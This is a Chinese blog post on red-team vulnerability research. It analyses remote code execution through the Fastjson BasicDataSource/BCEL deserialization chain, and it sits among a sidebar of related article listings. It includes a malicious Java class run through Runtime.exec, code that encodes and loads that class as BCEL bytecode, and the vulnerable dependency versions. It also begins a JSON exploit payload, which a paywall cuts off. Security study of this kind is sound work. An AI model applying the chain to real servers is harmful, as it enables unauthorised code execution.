红队漏洞研究-fastjsonBasicDataSource链分析

最新推荐文章于 2025-02-07 15:09:08 发布
原创 最新推荐文章于 2025-02-07 15:09:08 发布 · 1.3k 阅读 · 1
标签
#lsa #安全 #网络
本文深入探讨了Fastjson中的安全漏洞,特别是通过BCEL库实现的命令执行。详细分析了如何利用BCEL的ClassLoader进行命令注入,以及在fastjson不同版本中的利用方式,包括通过JSONObject和$ref进行调用的方法。文章还解释了为什么某些版本有限制,同时提供了相关POC和反序列化过程的解析。

前言

BCEL

BCEL的全名是Apache Commons BCEL,属于Apache Commons项目下的一个子项目,CC链也就是从Apache Commons产生的。

BCEL库提供了一系列用于分析、创建、修改Java Class文件的API。主要用来将xml文档转为class文件。编译后的class被称为translet,可以在后续用于对XML文件的转换。该库已经内置在了JDK中。关于BCEL具体详情可参考https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html

如何利用BCEL进行命令执行

BCEL中有一个类com.sun.org.apache.bcel.internal.util.ClassLoader,是一个ClassLoader,重写了loadClass方法。在ClassLoader#loadClass()中,其会判断类名是否是$$BCEL$$开头,如果是的话,将会对这个字符串进行decode。
在这里插入图片描述

首先编写一个恶意类

package com.darkerbox.bcel;

public class Evil {
   
   
    static {
   
   
        try {
   
   
            Runtime.getRuntime().exec("calc.exe");
        } catch (Exception e) {
   
   
            e.printStackTrace();
        }
    }
}

然后将该类生成为BCEL格式的字节码,使用这个字节码来新建对象,执行命令。

package com.darkerbox.bcel;

import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.util.ClassLoader;

import java.io.IOException;

public class BcelTest {
   
   
  public static void main(String[] args) throws IOException, ClassNotFoundException, IllegalAccessException, InstantiationException {
   
   
      JavaClass cls = Repository.lookupClass(Evil.class);
      String code = Utility.encode(cls.getBytes(),true);
      System.out.println("$$BCEL$$"+code);
      // 加载类并实例化
      new ClassLoader().loadClass("$$BCEL$$"+code).newInstance();
  }
}

我本地使用到的依赖。

<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version>1.2.24</version>
</dependency>
<dependency>
    <groupId>org.apache.tomcat</groupId>
    <artifactId>tomcat-dbcp</artifactId>
    <version>9.0.20</version>
</dependency>

在这里插入图片描述

在fastjson中的利用

先看看POC

package com.darkerbox.bcel;

import com.alibaba.fastjson.JSON;

public class test {
   
   
  public static void main(String[] args) {
   
   
    String payload =
        "{\n"
            + "    {\n"
            + "        \"aaa\": {\n"
            + "                \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n"
            + "                \"driverClassLoader\": {\n"
最低0.47元/天 解锁文章
Gamma_lab
关注
fastjson反序列化 BasicDataSource链分析
Vicl1fe的博客
01-06 1099
前言 BCEL BCEL的全名是Apache Commons BCEL,属于Apache Commons项目下的一个子项目,CC链也就是从Apache Commons产生的。 BCEL库提供了一系列用于分析、创建、修改Java Class文件的API。主要用来将xml文档转为class文件。编译后的class被称为translet,可以在后续用于对XML文件的转换。该库已经内置在了JDK中。关于BCEL具体详情可参考https://www.leavesongs.com/PENETRATION/where-i
fastjson不出网打法—BCEL链
2301_76227305的博客
11-25 4046
BCEL的全名应该是Apache Commons BCEL,它是一个库。这个库里面有类叫com.sun.org.apache.bcel.internal.util,而这个类里面有一个classLoader类,ClassLoader类里面有一个loadClass方法,如果满足class_name.indexOf("$$BCEL$$") >= 0,那么就会调用createClass这个方法。我们跟踪进createClass方法看看,可以看到这里会对进来的数据进行解码,所以我们传payload时要进行编码。
fastjson BCEL不出网打法
遇事不决冲冲冲
04-30 7623
BasicDataSource 如果目标服务器没有外网、无法反连,自然就用不了JdbcRowSetImpl利用链这种JNDI注入的利用方式,而TemplatesImpl利用链虽然原理上也是利用了 ClassLoader 动态加载恶意代码,但是需要开启Feature.SupportNonPublicField,并且实际应用中其实不多见,这里就引出BasicDataSource,我们可以直接在Payload中直接传入字节码并且不需要出网,不需要开启特殊的参数,适用范围较广,目标需要引入tomcat依赖,虽说也是
fastjson-BCEL不出网打法原理分析
weixin_49248030的博客
11-22 4335
与原生的 Java 反序列化的区别在于,FastJson 反序列化并未使用 readObject 方法,而是由 FastJson 自定一套反序列化的过程。通过在反序列化的过程中自动调用类属性的 setter 方法和 getter 方法,将 JSON 字符串还原成对象,当这些自动调用的方法中存在可利用的潜在危险代码时,漏洞便产生了。
【Web】速谈FastJson反序列化中BasicDataSource的利用
uuzeray的博客
03-03 1989
那么我们就可以设置​​driverClassLoader​​​为com.sun.org.apache.bcel.internal.util.ClassLoader​​​,设置​​driverClassName​​为恶意的BCEL格式的字节码,配合BCEL初始化任意恶意对象。}​​​ 这一整段外面再套一层​​{}​​,这样的话会把这个整体当做一个JSONObject,会把这个当做key,值为xxx。key为​​JSONObject​​对象,会调用该对象的toString方法。然后会以字符串的形式输出出来。
[JAVA反序列化初学4]Fastjson的BCEL字节码攻击分析
GX233的博客
05-08 4101
Fastjson、BCEL
利用BCEL打fastjson直接burp回显getshell
2201_75353421的博客
08-03 2961
fastjson我曾经写过漏洞的原理,但是公网遇到的漏洞越来越少,大多都是在内网的环境,内网里没办法使用dnslog去探测回显。这里学习一下用bcel链直接在bp中产生回显进而getshell。
java反序列化与Apache CC链、fastjson反序列化的理解与研究
Shanfenglan's blog
04-15 2211
文章目录1. 前言2. 为什么会存在序列化技术2. 序列化 1. 前言 java反序列化是将一个序列化文件或者序列化数据进行还原处理。一个被序列化的数据的2进制数据特征是以aced0005开头,有点类似于exe文件都有PE头一样,具体如下所示: 序列化技术的出现,是为了方便数据保存与传输的。它将数据变成了字节的形式进行保存并便于通过socket进行传输。 2. 为什么会存在序列化技术 1、方便对象的保存 2、方便对象在网络上传输 网络上只能传输字节流数据,对象本是无法在网络上直接进行传输的。而序列化技术可
java安全学习笔记--fastjson1.2.24反序列化漏洞两种利用链分析(TemplatesImpl,JdbcRowSetImpl)
m0_64685672的博客
02-03 2999
测试环境 jdk1.7 fastjson 1.2.24 Fastjson简介及用法 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象,常用在前后端分离的项目中,用来处理前端传来的json数据,JSON字符串和Java对象的转换就是基于序列化和反序列化来实现的。 演示代码: package com.test; import com.alibaba.fastjson.JSON;
【常用工具类】fastjson
整理输出各类知识
11-01 397
在项目种经常要调用第三方的接口获取返回值,返回结果一般都是JSON格式的字符串,需要使用JSON解析工具进行解析,比较常用的就是fastjson。将对象或者集合序列化成JSON字符串。将JSON字符串反序列化为指定对象。将JSON数组的字符串转换为集合。目前感觉这三个在项目中就够用了。
Java代码审计&FastJson反序列化&利用链跟踪&动态调试&autoType绕过
qq_46081990的博客
01-16 2498
本文深入分析了FastJson历史版本漏洞的利用链,使用IDEA动态跟踪调试,介绍了各版本不同CC链的关键执行流程及对应Poc的构造思路,另外还介绍了针对FastJson不同版本防御手法的绕过思路等等。
Java安全(十五) 一些链子之C3P0
WDWAGAAFGAGDADSA的博客
07-18 1117
C3P0常见
关于hessian2的一些疑点(0CTF来分析)
qq_62046696的博客
07-14 846
从SCTF的java题,看到了0CTF的java,发现都是考察hessian2的链子,于是分析了一段时间。发现本地搭建,就算使用师傅们的EXP都打不通,很郁闷,是jdk的原因嘛??//////实例化的类 实例化的超类 构造函数类型 构造函数值。
BCEL字符串还原object
问题很多的小明
06-10 2629
捕获到becl字符串: $$BCEL$$$l$8b$I$A$A$A$A$A$A$AmT$5bS$d3$40$U$fe$b6$84$$$84p$z$I$I$w$e0$85$C$z$I$e2$8d$9b$I$82$a2$F$R$Q$c5$eb$a4$e9$C$c16$e9$q$a9$c2$m$bf$c7g$7c$u$8e$cc$f8$e8$83$bf$c3g$7f$81$p$9eM$81$c2$90d$b2$9bs$be$_g$bfs$f6l$7e$fd$fb$fe$D$c0$A$de$ab$a8$c3u$
java安全之fastjson链分析
蚁景网安学院
06-03 850
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析稿件通过并发布还能收获200-800元不等的...
JAVA安全—FastJson反序列化&利用链跟踪&autoType绕过
最新发布
2301_76227305的博客
02-07 2233
目前主流公开的利用链都进行了分析,后续如果有其它的链条,再慢慢分析吧。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
Java反序列化漏洞CC2利用链注入内存马
道阻且长,行则将至
07-20 4927
本文从 0 到 1 介绍了 TemplatesImpl 链的基础原理,同时介绍其在 Fastjson 反序列化漏洞利用过程中的应用,最后介绍了 Java 反序列化漏洞 CC2 链中对 TemplatesImpl 链的集成,以及如何通过 CC2 链注入恶意类与 Java 内存马。
Java代码审计——Fastjson TemplatesImpl调用链
王嘟嘟的博客
12-09 3108
0x00 前言 反序列化总纲 除开jdbc调用链,还有一个TemplatesImpl的调用链,这个在CC链中是出现过的。可以参考:调用链 主要的要点在满以下三个变量 _bytecodes _name _tfactory 还有就是调用newTransformer的方法 0x01 调用链 先上poc: final String CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"; ParserConfig conf
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值